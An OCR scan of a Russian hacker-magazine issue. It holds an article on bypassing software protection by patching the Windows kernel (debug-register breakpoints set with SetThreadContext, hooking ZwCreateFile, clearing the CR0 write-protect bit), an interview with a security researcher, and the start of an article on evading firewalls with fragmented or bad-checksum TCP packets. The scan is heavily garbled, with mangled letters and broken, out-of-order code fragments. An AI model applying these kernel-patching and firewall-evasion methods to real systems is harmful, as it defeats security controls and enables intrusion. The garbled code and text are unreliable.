редачи управления тут же возбужда- 


ет исключение, неизбежное, как вос- 


ход солнца. Это и демонстрирует сле- 
дующая программа. Она сканирует ag- 
ресное пространство и выводит agpe- 


са всех страниц, к которым есть goc- 
туп на исполнение. Ни одной страни- 
цы выше 800000001 здесь не обна- 
руживается. 


Хотя... На нулевом кольце (наш 
драйвер исполняется именно там) 
можно творить все что угодно. Сотво- 
рить Адама вряд ли получится (с ис- 
кусственным интеллектом прогресс 
застрял на уровне дождевого червя), 
но отключить защиту мы сможем. 
Правда, это будет слишком заметное, 


Клиентское приложение, работающее 
на прикладном уровне, неизбежно 
обречено на поражение. 
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уродливое и к тому же небезопасное 
решение. Защита установлена на 
верхнюю половину памяти не даром. 
Она не позволяет приложениям вхо- 
дить в разнос, и хотя операционная 
система спокойно проживет и без нее, 
это будет сплошное варварство. 
Проведем простой эксперимент - на- 
пишем программу, которая передает 
управление куда-то в глубину ядра, и 
посмотрим, что происходит при этом. 


Как и следовало ожидать, мы полу- 
чаем исключение типа "ошибка досту- 
па", и управление передается не Ha 
ядро, а на обработчик структурного 
исключения, он же SEH - Structured 
exception handling (поиск по однои- 
менному ключевому слову в MSDN 
или интернете выдает очень много 
интересного). У каждого процесса 
имеется как минимум один структур- 
ный обработчик, устанавливаемый 
операционной системой. Он выводит 
пресловутое сообщение о критичес- 
кой ошибке на экран и завершает 
приложение. Программист может ус- 
танавливать и свои обработчики, пе- 
рехватывающие исключения и тем 
или иным образом обрабатывающие 
критическую ситуацию. К сожалению, 
все они выполняются в контексте дан- 
ного процесса, про сложности внедре- 
ния в адресное пространство которо- 
го мы только что говорили. Тупик? 

Вовсе нет! На самом gene SEH полу- 
чает управление в последнюю оче- 
редь, когда бал окончен, закуска съе- 
дена, а девушки вытворяют весь SEH, 
на который только способно наше во- 
ображение. При возникновении иск- 
лючения процессор автоматически 
переходит в режим ядра и передает 
управление операционной системе, 
точнее, тому самому коду, на который 
указывает соответствующий элемент 
таблицы прерываний (IDT - Interrupt 
Description Table). Любой драйвер мо- 
жет беззастенчиво модифицировать 
содержимое IDT по своему усмотре- 
нию, перехватывая все прерывания, 
которые ему нужны. Техника перехва- 
та подробно описана в любой книге, 
посвященной программированию в 
защищенном режиме. К примеру в 
учебнике Юрова, который так и назы- 


HOPA МЫЩЬХ!"А 


@ Мыщьх поднял экспериментальный ftp-cepBep, раздающий свои 


заначки в электронном виде. 


|Р-адрес: 83.239.33.46 (доменного имени пока нет) 
Порт: 21 (стандартный) 
Логин: хакер 

Пароль: хаКер 

Папка: /pub 


ЕЙ 
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tii 


Приблизительное время работы: с 14:00 go 06:00 (мыщьх - ночной 


зверь). 


При возникновении проблем рекомендуется установить 


пассивный режим Ёр-клиента. Никаких ограничений на количество 
подключений нет. Канал - 500 мегабит, так что налегайте. Только 
не все сразу ;). Банов не ставят: мыщьх - добрый сисоп :). 


вается - "Ассемблер - учебник". Еще 
есть Зубков, Гук и известная рассыл- 
ка Калашникова. 

Главное, что решить нашу задачу 
все-таки возможно. Несмотря на то, 
что верхняя половина адресного 
пространства недоступна прикладным 
процессам, аппаратная точка остано- 
ва все-таки передает управление об- 
работчику, причем на прикладном 
уровне это протекает незаметно и до 
SEH'a дело просто не доходит. Вот Ta- 
кие превратности таят в себе мета- 
моророзы программирования в защи- 
щенном режиме. 

Идем дальше. Линейный адрес точ- 
ки останова хранится в регистрах ОгО- 
Dr3. Об этом рассказывает "‹фирмен- 
ная" документация от Intel и AMD, а 
моя "Техника и срилособрия хакерских 
атак" содержит исходный код перех- 
ватчика со всеми комментариями. 
Кстати, электронную версию можно 
бесплатно утянуть с моего персональ- 
ного Ир-сервера (подробности во 
врезке). 

В семействе МТ природа точек оста- 
нова - сугубо локально. Каждый про- 
цесс владеет своим набором регист- 
ров DrO-Dr3, и хотя количество точек 
останова от этого не увеличивается, 
они срабатывают только в контексте 
того процесса, в котором были уста- 
новлены. Елки-палки, опять этот кон- 
текст! Ни одно начинание без него не 
обходится. Такова природа многоза- 
дачной МТ, а против нее не попрешь. 
В 9х все проще: точки останова носят 
глобальный характер, распространяю- 


щийся на все процессы, что одновре- 
менно хорошо и плохо. Хорошо пото- 
му, что для установки точек останова 
не нужно лезть в чужой процесс, а 
плохо потому, что точки останова сра- 
батывают в каждом процессе и обра- 
ботчику приходится каждый раз раз- 
бираться, кто есть кто и куда. 

К счастью, в нашем распоряжении 
есть две мощных функции 
GetThreadContext и SetThreadContext. 
Первая читает контекст потока, BTO- 
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рая, соответственно, устанавливает. В 
общих чертах алгоритм выглядит так: 
определяем PID нужного процесса (а 
определить его можно с помощью вы- 
зовов TOOLHELP32, о которых рас- 
сказывается в любом хакерском FAQ, 
или с помощью ничуть не менее изве- 
стной недокументированной сфункции 
ZwQuerylnformationProcess, описан- 
ной там же). Полученный PID nepega- 
ется функции 
CreateToolhelp32Snapshot, создающей 
список процесса со всеми его потока- 
ми, разбором которых занимаются 
функции Thread32First/Thread32Next 
(работают по принципу известной па- 
рочки FindFirstFile/FindNextFile). 
Первый поток, как правило, и явля- 
ется основным, однако в некоторых 
случаях это не так, но это уже детали. 
Как бы там ни было, идентификатор 
потока передается функции 
OpenThread. Что за OpenThread? Нет 
какой функции! OpenProcess есть, а 
OpenThread конструктивно не предус- 
мотрена. Каждый программист это 
знает! Достаточно взять в руки доку- 
ментацию и прочитать. Но документа- 
цию хакеры читают в последнюю оче- 
редь (если ничего не помогает, проч- 
ти, наконец, документацию), а перед 
этим просто вызывают сфункции нао- 
бум :) или, на худой конец, лезут в 
MSDN за Knowledge Base, в которой 
недвусмысленно сказано, что функ- 
ция OpenThread все-таки есть. Она 
честно экспортируется 
KERNEL32.DLL, но в SDK и заголовоч- 
ные файлы не включена. Так захоте- 
лось какому-то менеджеру из 
Microsoft. Может, у него настроение 
было плохое или жена заболела, а тут 
еще OpenThread'b! всякие... Заметка 
под номером 0121093 ("Points to 
Remember When Writing a Debugger 
for Win32s"), датируемая застойным 
1997 годом, об этом конкретно и гово- 
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Поиск в MSDN по ключевому слову OpenThread выдает пару интересных статей 


$ЗЕСУОВИТУ - ФОКУСЫ 


Смотри 
WINNT.H, если 


нужна структу- 
ра СОМТЕХТ. 


Закон жизни: 
чем активнее 
совершенству- 
ются защит- 
ные системы, 
тем активнее 
их начинают 
ломать. 
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put. Так что жаловаться Ha закры- 
тость информации не приходится. 
Функция принимает единственный 
аргумент - идентификатор потока, а 
возвращает его дескриптор или голи- 
мый ноль, если с открытием происхо- 
дит облом (например, недостаточно 
прав). Менять содержимое контекста 
на ходу недопустимо (это все равно 
что перебегать скоростную автомаги- 
страль на красный свет), поэтому по- 
ток перед изменением необходимо за- 
тормозить функцией SuspendThread. 
Тогда можно вызывать 
GetThreadContext с флагом CON- 
TEXT_FULL и читать контекст, органи- 
зованный в виде одноименной струк- 
туры СОМТЕХТ. Здесь опять возника- 
ют сложности. Platform SDK не приво- 
дит никакой информации о 
CONTEXT'e, мотивируя это тем, что ра- 
ботать с контекстом на низком уровне 
никому не нужно: он де недокументи- 
рован и на каждой платформе реали- 
зован по-своему... На самом деле су- 
ществует только одна платформа - 
INTEL, а все остальное - экзотика. 
Маркетоиды могут говорить что yrog- 
но и громоздить один уровень 
абстракции поверх другого, но прог- 
раммистов на этом не проведешь! 
Разработчики Windows прекрасно по- 
нимали, что без работы с регистрами 
ни одна системная программа все рав- 
но не обходится, и подарили нам за- 
мечательный файл WINNT.H, входя- 
щий в состав Platform SDK и содержа- 
щий определения многих недокумен- 
тированных структур (и структуры 


СОМТЕХТ в том числе) с более-менее 
подробными комментариями. 
Модифицировав регистры процессо- 
ра по своему усмотрению, мы вызыва- 
ем функцию GetThreadContext и раз- 
мораживаем поток с помощью 
ResumeThread. Все! Теперь наш хаке- 
рский обработчик восстанавливает 
1ОТ в прежний вид и самоликвидиру- 
ется, выгружая драйвер из памяти. В 
упрощенном виде это происходит так: 


// получаем дескриптор потока, 

// вызывая недокументированную функцию 
OpenThread 

hThread = OpenThread(ld); if (!hThread) return; 


// даем потоку наркоз 
SuspendThread(hThread) 


// товорим, что нам нужен полный контекст 
оми кишками отладочных регистров 
Context.ContextFlags = СОМТЕХТ РОН: 


аем контекст из недр потока 
GetThreadContext(hThread, Context); 


// модифицируем отладочные регистры семейства 
Drx, 

устанавливая аппаратную точку останова на хакае- 
МЫЙ КО0 


// имплантируем обновленный контекст обратно в по 
OK 


SetThreadContext(hThread, С. 


// пробуждаем поток 


Реальный код сосредоточен в 
NTOSKRNL.EXE - подлинном ядре 
операционной системы. 
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ResumeThread(hThread) 


Огромный минус этой технологии в 
том, что она слишком заметна, к тому 
же поток может запросто защититься 
от GetThreadContext, но на этот слу- 
чай в нашем хакерском бардачке есть 
отдельный стратегический план. 

Как известно, KERNEL32.DLL cogep- 
жит лишь высокоуровневые "оберт- 
ки" реальных АТР-хфункций, ведущих 
к очередной "обертке" в лице 
NTDLL.DLL. Реальный код сосредото- 
чен в NTOSKRNL.EXE - подлинном яд- 
ре операционной системы, которое 
проживает в верхней половине agpec- 
ного пространства. Ядерные функции 
всегда исполняются в чьем-то конте- 
ксте, который в общем случае являет- 
ся контекстом процесса, вызывавше- 
го ту или иную АР|-функцию. Процес- 
COB, не вызывающих никаких API- 
функций, в природе не встречается. 
Даже если процесс состоит из одного 
лишь return (кстати, Windows 2000 от- 
казывается грузить файлы без им- 
порта KERNEL32.DLL), определенная 
часть кода системного загрузчика ис- 
полняется в контексте загружаемого 
процесса и вызывает множество 
ядерных функций. Короче, загрузить 
процесс, не потревожив ядра, практи- 
чески нереально (разве что загру- 
жать его на виртуальной машине). А 
это значит, что регистры Drx могут 
быть установлены прямо из ядра без 
обращения к АР!-функциям 
GetThreadContext и SetThreadContext! 
Отследить эти махинации практически 
нереально! 

Для осуществления задуманного ты 
должен перехватить одну или нес- 
колько ядреных функций, вызывае- 
мых из контекста атакуемого процес- 
са еще до того, как защитный меха- 
низм получит управление (после уже 
будет поздно). Этим условиям отвеча- 
ет функция ZwCreateFile, хотя, если 
защищенный код расположен в са- 
мом начале приложения, она нам ни- 
чем не поможет и потребуется встраи- 
ваться в загрузчик РЕ-файлов, что 
несколько труднее, так что оставим 
все частности за рамками разговора и 
вернемся к ZwCreateFile. 

Дизассемблерный листинг будет 
выглядеть приблизительно так (есте- 
ственно, линейный адрес функции в 
памяти будет совсем другим, но его 
легко определить по таблице экспор- 
та, так как NTOSKRNL.EXE - это факти- 
чески обыкновенный исполняемый 
файл): 


ext:0042FC00 ZwCreateFile proc near 


CODE XREF: sub 4901924Dvp 


00 arg_0 = byte ptr 4 
00 
2FC00 B8 20 00 00+ mov eax, 20h 
542404 lea edx 


ext:0042FC05 8D 


text:0042FC09 CD 2E int 
2th 
text:0042FCOB C2 2C 00 retn 


2Ch 

text:0042FCOB ZwCreateFile endp 
text:O042FBFE ; еее 
text:0042FBFE 8B FF mov 
edi, edi 


Структура ассемблерного кода впол- 
не типична для функций с префиксом 
Zw. Сначала идет загрузка регистров, 
затем ИМТ 2Eh, а за ней RETN ХХ. Ан- 
тивирусы об этом хорошо знают, и по- 
тому "тупое" внедрение команды IMP 
на_наше_тело сразу же вызовет по- 
дозрения (впрочем, к AVP и Dr.WEB 
это не относится). А вот подмена ко- 
манды RETN ХХ гораздо менее замет- 
на. Проблема в том, что RETN ХХ за- 
нимает три байта, а JMP на_наше_те- 
ло - целых пять! К счастью, за концом 
7м-функций практически всегда при- 
сутствует последовательность 8B FF 
(команда MOV EDI, EDI, двухбайтовый 
аналог МОР), оставленная для вырав- 
нивания. Все вместе они и дают пять 
байт. Хорошо! Сохраняем оригиналь- 
ную команду КЕТМ ХХ в своем драй- 
вере, делаем JMP, передающий уп- 
равление хакерскому обработчику, 
также расположенному в драйвере. 
От Hero требуется взвести регистры 
Огх и восстановить команду КЕТМ ХХ, 
тут же передав на нее управление. 
Другими словами, выключить свет и 
замести следы. 

Ax, да! Непосредственно модифици- 
ровать память ядра не получится, так 
как она защищена от изменений, но 


эту защиту легко отключить. Способ 
первый, простой, документированный, 
но слишком заметный и вообще не- 
красивый: лезем в реестр, открываем 
раздел HKLM\SYSTEM\ 
CurrentControlSet\ 
Control\SessionManager\ 
MemoryManagement и создаем пара- 
метр EnforceWriteProtection типа 
REG_DWORD. Защита от записи отклю- 
чена! Но и хакер отключен, причем тя- 
желым ударом сапога. Кто угодно мо- 
жет запустить редактор реестра и пос- 
мотреть. Правда, если на атакуемом 
компьютере установлен Soft-ice или 
некоторые пакетные фильтры (сни- 
qpep или же брандмаузр), то этот клю- 
чик уже стоит и никаких дополнитель- 
ных усилий от нас не потребуется. 
Впрочем, при желании к реестру 
можно даже не обращаться. Защита 
отключается на лету сбросом бита WP 
в регистре CRO (WP - Write Protection). 
И точно так же устанавливается 
вновь, словно никто ничего и не тро- 
гал :). Весь код укладывается в нес- 
колько ассембперных команд, что 
намного элегантнее труднопроизноси- 
мых ключей реестра (наверное, в 
Microsoft разработчикам платят как 
журналистам - за каждый байт). 


mov ebx, 0 ; получаем текущее значение регистра CRO 
push ebx ; КЛадем его копию Ha стек 

and ebx, -010000 ; сбрасываем WP бит 

mov cr, ebx  ; загоняем обновленное значение в CRO, 
Чотключая защиту 


‚ модифицируем код ядра 


Всякую защиту можно взломать! 


Отключение защиты ядра через реестр 


pop ebx; ‚ достаем сохраненную копию CRO из стека 
mov сгО, ебх  ; загоняем ее в регистр CRO, возвращая 
защиту в прежний вид 


Кстати, модификация ядерных 
функций при работе на многопроцес- 
сорных машинах эпизодически вгоня- 
ет систему в синий экран, что создает 
определенные проблемы. Более кор- 
ректный (но и более заметный) путь 
сводится к правке таблицы экспорта и 
активному использованию "семафро- 
ров". Патч ядра - это не шутка! Необ- 
ходимо иметь опыт работы с симмет- 
ричными многопроцессорными систе- 
мами (SMP - Symmetric Multi- 
Processing) и знать кучу вещей из са- 
мых разных предметных областей. Но 
дорогу осилит идущий! Падает тот, кто 
бежит! 


$ЕСОВИТУ - ФОКУСЫ 


BbIBOD 

и Всякую защиту можно взломать! 
Проверка собственной целости не 
спасает. Клиентское приложение, ра- 
ботающее на прикладном уровне, не- 
избежно обречено на поражение. 
Внедрение в ядро операционной сис- 
темы - это термоядерное оружие, сме- 
тающее любые преграды на своем пу- 
ти. Чем активнее совершенствуются 
защитные системы, тем активнее их 
начинают ломать. Воззвания к закону 
только подливают масла в огонь, по- 
ощряя поиски легальных путей взло- 
ма, а законодательство очень инерт- 
но. Однажды принятые законы 
действуют десятилетия, а для компь- 
ютерной индустрии это целая веч- 
ность. Кстати о вечности. Надо бы со- 
вершить вылазку на кухню и что-ни- 
будь захомячить :). 


Ядерное оружие, уничтожающее защитные механизмы 
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ПРОФЕССИОНАЛА 


ИНТЕРВЬЮ С ЗАРАЗА 


ногие, наверное, знают, кто такой ЗАРАЗА. Этим псевдонимом он уже подписал множество публикаций в Сети и 
различных журналах, посвященных компьютерной безопасности, в том числе в "Хакер" и "Хакер Спец". 


XS: Kak тебя предста- 


вить общественности? 


ЗАРАЗА: Представь 


меня в домашнем хала- 
те с пулеметом. Убойное зрелище :). 


XS: Давно ты в компьютерной безо- 
пасности? 


ЗАРАЗА:Я вообще до сих пор не по- 
нимаю, как я туда попал, когда и за- 
чем. Должно быть, лет пять-шесть на- 
зад и совершенно случайно. 


XS: Что тебя так привлекает в 
компьютерной безопасности? Есть же 
много других интересных профессий. 
Строитель, наконец :). Почему, кстати, 
ЗАРАЗА? 


ЗАРАЗА: Строителем не хочу: цемент 
в ушах застревает... Да и компьютер- 
ная безопасность, строго говоря, тоже 
не моя специальность. Люди нравятся 
больше, чем компьютеры. Поэтому я 
руковожу поддержкой пользовате- 
лей. Работа нескучная, о ней много 
грустных историй рассказывают. Счи- 
тается, что это анекдоты. А ЗАРАЗА 
потому, что зараза. Пару раз назвали, 
привык, стал подписываться, прижи- 
лось. 


Х5: Ты больше ломаешь или защи- 
щаешь? Что интереснее? 


ЗАРАЗА:Я изучаю аномалии. Как 
нахожу какую-нибудь "странность", 
так и смотрю на нее, смотрю... Пока 
что-нибудь не увижу. А потом пыта- 
юсь понять, что с этой странностью 
делать и для чего ее использовать 
можно, верчу ее во все стороны и 
пытаюсь узнать: то ли это что-то 
сломалось, то ли защитилось, то ли 
это и не странность вовсе. Такой па- 
раноидально-шизоидный творчес- 
кий подход. Причем странностей 
вокруг так много, что специально их 
искать не приходится - они сами те- 
бя находят. Надо только маленькие 
странности разглядеть, а большие 
не пропустить. 
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XS: Основная работа как-то связана 
с деятельностью ЗАРАЗЫ или это хоб- 
би просто сделало тебя профи? 


ЗАРАЗА: Как-то все взаимосвязано. 
Конечно, по работе приходится ре- 
шать любые вопросы от консульта- 
ций по вопросам безопасной настрой- 
ки чего-либо, поиска причин различ- 
ных ошибок и их устранения и до раз- 
бора инцидентов, поисков виновного 
или даже контактов с правоохрани- 
тельными органами или подготовки 
документов для суда. Случалось как 
наказывать виноватого, так и оправ- 
дывать невиновного. Хотя я себя не 
считаю проси в вопросах безопас- 
ности: это просто одна из сфер инте- 
ресов, в которой я ориентируюсь 
весьма выборочно и поверхностно. 
Вот лучше дайте нам клиентов - мы их 
поддержим, они наделают неприят- 
ностей - мы их застрелим. Не клиен- 
тов, разумеется. Troubleshooting - это 
то, что нам хорошо удается. 


х5:Раньше атаковали серверы, a 
сейчас акцент сместился на кли- 
ентов? 


ЗАРАЗА: Акцент сместился на клиен- 
тов довольно давно. Основные мето- 
ды атаки на клиентов появились бо- 
лее пяти лет назад. А примерно с 2001 
года многие (я, конечно, Жора Гуни- 
нский, пара китайцев-японцев и дру- 


гие азиаты) стали кричать, что век 
серверных атак прошел, потому что 
это нам слишком сложно и непонятно. 
А атаковать клиентов легко, приятно, 
и попадаешь сразу куда надо - к 
пользовательским данным. 


Х5:В чем специфика взлома клиен- 
тских приложений? 


ЗАРАЗА: Специфика очень широкая. 
Серверное приложение, как правило, 
работает в демилитаризованной зоне 
и очень часто без каких-либо приви- 
легий. Атака на серверное приложе- 
ние редко открывает доступ во внут- 
реннюю сеть. Клиентское же прило- 
жение сидит во внутренней сети и 
имеет доступ ко всем данным, к кото- 
рым имеет доступ пользователь. Сер- 
вер - это почти всегда "произведение 
искусства", имеющее в некотором 
смысле уникальную конфигурацию. 
Конфигурация клиента редко отлича- 
ется от типовой. Клиентов гораздо 
больше. Все это наводит на мысль: 
атаку на клиента можно сделать мас- 
совой, поставить на конвейер. А зна- 
чит, это уже не хак. И атакуют клиен- 
тские приложения очень часто с сов- 
сем другими целями. Атаки на клиен- 
тское приложение как "чистое искус- 
ство" остались позади, сейчас это 
способ зарабатывания денег на соз- 
дании ботнетов. 


Х5:Разработчики файрволов не 
скрывают, что не могут защитить от 
атаки гуру, но обещают отразить 99% 
стандартных атак. Какой тогда смысл? 


ЗАРАЗА: А именно такой смысл - от- 
разить массовые атаки, которые сос- 
тавляют 99,999% всех атак. Получа- 
ется вероятность отражения атаки 
98,999%, что вполне приемлемо. Осо- 
бенно если этот файрвол стоит на та- 
ком ничтожно малом проценте машин, 
что предпринимать меры для его об- 
хода атакующему не имеет смысла. 
Дело в том, что защищаться, когда 
собираются сломать именно тебя, 
всегда значительно дороже. Одними 
файрволами тут не обойтись. 


постоянно, это нормальная рабочая 
ситуация. Случались и неприятные 
инциденты на собственном компьюте- 
ре. На нем нет каких-либо критичных 
данных, требующих параноидального 
уровня безопасности, соответственно, 
нет и параноидального подхода к его 
защите. Больше думаешь об удоб- 
стве, чем о безопасности. Случалось 
даже своими руками запускать троян- 
ца в реальной машине вместо вирту- 
альной. Ну, неприятно, конечно, при- 
ходится ждать последствий, вспоми- 
нать, где какие пароли и как их ме- 
нять, какие критичные данные могли 
утечь и куда. А главное, всегда есть 
подозрение, что ты можешь быть 
взломан прямо сейчас, но еще об 
этом не знаешь. Никогда не бывает 
возможности полностью защититься, 
не стоит даже пытаться. Надо, исходя 
из имеющихся ресурсов и требуемых 
условий работы, создать оптималь- 
ный уровень защиты и быть мораль- 
но готовым к любым ситуациям. 


К сожалению, многие GO сих пор уверены, 
что проблема решается антивирусом 
и персональным сфайрволом 


Х5: Может, стоит завести два компь- 
ютера? Один с выходом в интернет, а 
другой для хранения ценной иноор- 
мации? Может, к этому все и идет? 


ЗАРАЗА:К этому давно все пришло, 
похожие решения обсуждаются в ста- 
тейке "Безопасность клиентского 
программного обеспечения" 
(www.security.nnov.ru/articles/frontend). Может, стоит 
завести два компьютера, может быть, 
ходить в интернет из виртуальной ма- 
шины. Может, вынести терминальный 
сервер в демилитаризованную зону и 
ходить в интернет оттуда. Может быть, 
запускать браузер из-под гостевой за- 
писи, может быть, правильно систему 
настроить, может быть, вообще в ин- 
тернет не ходить :). Или переставлять 
свой BeOS каждое утро. А может, плю- 
нуть - и пускай ломают сколько вле- 
зет, не жалко. Надо просто просчи- 
тать, что дешевле обходится. 


XS: А ты сам подвергался изыскан- 
ным атакам со стороны коллег? Како- 
во быть взломанным? 


ЗАРАЗА: Постоянно... То в отпуск 
свалят, то работы NOGCYHYT, то коньяк 
вместо кока-колы, то стакан сопрут. 
Быть взломанным - конечно, случа- 
лось. Когда в зоне твоей ответствен- 
ности имеются тысячи клиентов, в том 
числе корпоративных, у которых сум- 
марно десятки, если не сотни, тысяч 
компьютеров. И у каждого свой под- 
ход к безопасности - от параноидаль- 
ного до отсутствующего. Ты взломан 


Х5:Возникает ситуация, когда лома- 
ют уже не программы, а протоколы, 
которые они используют. Но это же 
утопия? 


ЗАРАЗА: Почему утопия? Безопас- 
ность - утопия. А протоколы созда- 
ются людьми, причем очень часто 
вопросы безопасности не то что не 
стоят на первом месте, но и вообще 
не возникают. Особенно это касает- 
ся старых протоколов. Следует 
вспомнить, что интернет (точнее, 
ARPANet) создавался как закрытая 
военная сеть. Никто не мог тогда и 
подумать, что туда попадет кто-то 
посторонний. Отсюда, например, ши- 
роко обсуждаемые сейчас уязвимос- 
ти протокола ТСР 
(wwwsecurity.nnov.ru/news4689.html). А как за это 
время выросла производительность 
сетей и вычислительной техники? 
Если раньше задача взлома DES- 
ключа или подбора идентификатора 
DNS-3anpoca была труднореализуе- 
мой ввиду низких тактовых частот 
или малой пропускной способности 
сети, то сейчас подобное стало 
вполне реальным. Кто мог знать, что 
электронная почта получит такое 
распространение, что по ней можно 
будет рассылать рекламу по сотне 
миллионов адресов? Протоколы ус- 
таревают, но перейти на новые про- 
токолы в Internet практически не- 
возможно, так как слишком многое 
на них опирается. Поэтому переход 
со временем Ha Internet-ceTb второ- 
го, третьего, четвертого и т.д. поко- 


ления неизбежен. Хотя отдельные 
утопически настроенные товарищи с 
пост-КГБ-мышлением считают, что 
проблему можно устранить вернув- 
шись к ARPANet, в которую "посто- 
ронних" не будет пускать гражданин 
с кирпичной мордой, проверяющий 
у всех наличие паспорта и Антиви- 
руса Касперского. 


XS: Какие тенденции в сфере безо- 
пасности клиентских приложений? 
Есть ли свет в конце туннеля? 


ЗАРАЗА: Света нет, клиентские при- 
ложения в будущем сохранятся. Тен- 
денции есть. Сдвиг в головах поль- 
зователей и разработчиков уже поч- 
ти произошел. К сожалению, многие 
до сих пор уверены, что проблема 
решается антивирусом и персональ- 
ным файрволом, интегрированным в 
систему. К счастью, в этом уверены 
не все. Безопасность клиентских сис- 
тем уже стала существенно лучше в 
сравнении с тем, что наблюдалось 
еще пару лет назад. Об этом свиде- 
тельствует и "сдвиг" атак в сторону 
социальной инженерии. Опыт пока- 
зывает, что один и тот же пользова- 
тель может запустить червя, при- 
шедшего по электронной почте с 
разным текстом и по-разному упако- 
ванного, неограниченное количество 
раз. В то же время жертвы фишинга 
или "нигерийских" писем, как прави- 
ло, начинают их отличать после 
трех-четырех попыток в зависимости 
от потерянной суммы. Перспектив- 
ные технологии - разграничение дос- 
тупа на уровне приложений (дове- 
ренные и недоверенные приложе- 
ния, доверенные и недоверенные ис- 
точники информации и т.9д.), разгра- 
ничение уровней доступа между час- 
тями приложений (сепарация приви- 
легий), маркировка информации. 


XS: Kak защищаешься сам? И от кого? 


ЗАРАЗА: Не хамлю. Занимаюсь спор- 
том. Делаю зарядку. Хожу пешком. 
Неплохо стреляю. А защищать себя - 
какой смысл? Денег за это все равно 


не платят... 
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ПОЛОСА ПРЕПЯТСТВИЙ ) 


Крис Касперски ака мыщьх 


ПОЛОСА 
ПРЕПЯТСТВИЙ - 


ПРЕОДОЛЕНИЕ ФАЙРВОЛОВ СНАРУЖИ И ИЗНУТРИ 


онатыкали тут брандмауэров! Житья от них никакого. Даже в ХР появилось какое-то подобие, но никак не 
работающее :). Народ только и спорит, насколько эта штука нужна и можно ли ее обойти. Можно! 
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M3 СВОБОДЫ В 


m Пакетные фильтры, 


работающие на уровне 
IP-npotokona или ниже, 
а также все аппаратные брандмауэры, 
встроенные в материнские платы или 
DSL-mogeMbl, не могут самостоятельно 
определить порт назначения, пос- 
кольку в !Р-протоколе никаких портов 
отродясь не было и они присутствуют 
только в протоколах ТСР и UDP. Но 
как-то же брандмауэры работают. 
Как?! Анализируют ТСР-заголовки. 
Казалось бы, все просто. Но сложнос- 
ти начинаются тогда, когда хакер по- 
сылает сильно фрагментированный 
ТСР-пакет. Настолько сильно, что в 
первом !Р-пакете уже не оказывается 
конца ТСР-заголовка и порт назначе- 
ния переходит в следующий ГР-пакет. 
Что может сделать с таким пакетом 
брандмауэр? Он не в состоянии соби- 
рать ТСР-пакеты вручную, поскольку 
это вообще-то не его задача, а если 
он все-таки соберет, ему придется за- 
держивать !Р-пакеты, накапливая их в 
очередях. Как следствие, потребности 
в памяти возросли, а скорость работы 
канала упала. Пользователь начнет 


материться и снесет такой брандмау- 
эр. К тому же собрать ТСР-пакет не 
так-то просто. Малейшая небрежность 
мгновенно оборачивается огромными 
дырами и голубыми экранами :). 

Раз ТСР-пакет нельзя собрать, то, 
может быть, лучше прибить его от 
греха подальше? В нормальных усло- 
виях такие пакеты не встречаются. 
Проблема в том, что порядок получе- 
ния [Р-пакетов чаще всего не совпа- 
дает с порядком следования ТСР- 
фрагментов, поэтому пакетный 
фильтр опять-таки должен вести учет 
пакетов, хотя бы частично реализуя 
протокол ТСР. А это безнадежное де- 
ло. Несмотря на почетный возраст 
"сррагментной" атаки, она остается ак- 
туальной даже на сегодняшний день, 
и многие брандмауэры легко пробива- 
ются срагментированным ТСР-па- 
кетом. 

Рассмотрим еще одну популярную 
атаку, нацеленную на пакетные 
фильтры уровня IP. Среди прочих 
ТСР-полей притаилось поле контроль- 
ной суммы. Как оказалось, брандмауэ- 
ры не контролируют его, поскольку 
для этого им потребовалось бы соби- 
рать весь ТСР-пакет целиком, к тому 


Настоящая огненная стена, боящаяся только одного - огнетушителя 
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же расчет CRC - достаточно "прожор- 
ливая" операция, а загружать процес- 
сор нехорошо :). 

Если tcpip.sys драйвер получает "би- 
тый" ТСР-пакет, он молчаливо приби- 
вает его, независимо от того, открыт 
данный порт или закрыт. Пакетные 
фильтры ведут себя иначе, и, если за- 
данный порт закрыт, отправителю по- 
сылается "честный" RST, дескать, не 
ломись туда, куда тебя не просят. Ко- 
нечно, пакет все равно будет прибит, 
но, по крайней мере, мы узнаем, что 
здесь присутствует агрессивный fire- 
wall. Впрочем, при некотором стече- 
нии обстоятельств проникнуть через 
брандмауэр все-таки можно, о чем со- 
ветую прочитать в статье "Firewall 
spotting and networks analisys with a 
broken CRC" в журнале Phrack 
(www.phrack.org/phrack/60/p60-Ox0c.txt). 

Еще проще проникнуть через NAT, 
который ретранслирует сетевые адре- 
са в обход брандмауэров, висящих 
выше уровня tcpip.sys. Достаточно ус- 
тановить легальное соединение с ата- 
куемым портом. Брандмауэр даже не 
пикнет. Но от сканирования портов 
лучше воздержаться. Брандмауэр мо- 
жет легко распознать эту ситуацию, 
забанив твой IP. 

Кстати, ни один известный брандма- 
уэр не обращает внимания на поря- 
док загрузки драйверов. Для Dial-Up'a 
это действительно безразлично, пос- 
кольку к тому моменту, когда пользо- 
ватель полезет в Сеть, брандмауэр 
будет гарантированно загружен. А 
для постоянного подключения (DSL- 
модем или сетевая карта) это уже кри- 
тично! Если драйвер модема или сете- 


'Аппаратный брандмауэр заключен имен- 
но в этом керамическом прямоугольнике 


вухи загрузится раньше брандмауэра 
(часто все происходит именно так), то 
на какое-то время компьютер окажет- 
ся беззащитен! Обычно это продол- 
жается от тридцати секунд до нес- 
кольких минут. Казалось бы, что тут 
такого? Вероятность атаки ничтожно 
мала... Как бы не так! В разгар эпиде- 
мии червя MS Blast (он же Love San) 
он ломился на порт чуть ли не через 
каждые полчаса и проникновение из 
маловероятного становилось вполне 
реальным. К тому же хакер может 
уронить атакуемую систему в синий 
экран, склоняя ее к перезагрузке, и 
тут же обрушить на нее шторм паке- 
тов, ломящихся на заблокированный 
порт. К тому времени, когда брандмау- 
эр завершит свою загрузку, атака бу- 
дет завершена :). 

Брандмауэр может и сам стать объ- 
ектом атаки, особенно если представ- 
ляет собой МО!5-драйвер, реализую- 
щий часть функций TCP/IP. Специаль- 
но подготовленным пакетом можно 
свалить его в синий экран или пере- 
дать управление на shell-Kog. В част- 
ности, Jetico падает при сканирова- 
нии машины утилитой XSpider (прав- 


Они преодолевают брандмауэры 


КАК ЗАТОПТАТЬ SYGATE 


да, последние версии Jetico He прове- 
ряли). Кроме того, никакой брандмау- 
эр не спасает от атак на драйвер 
tcpip.sys, а ошибки в нем тоже содер- 
жатся. В частности, техническая за- 
метка KB893066, датируемая 17 июня 
2005 (www.microsoft.com/technet/security/bulletin/ms05- 
(19 mspx), сообщает о дыре в tcpip.sys, 
способной выполнять Shell-kog или 
вызывать синий экран. Пакетные 
фильтры, работающие на NDIS-ypos- 
не, от этой проблемы не спасают, пос- 
кольку внешне хакерские пакеты выг- 
лядят вполне нормально. Конечно, та- 
кие дыры появляются далеко не каж- 
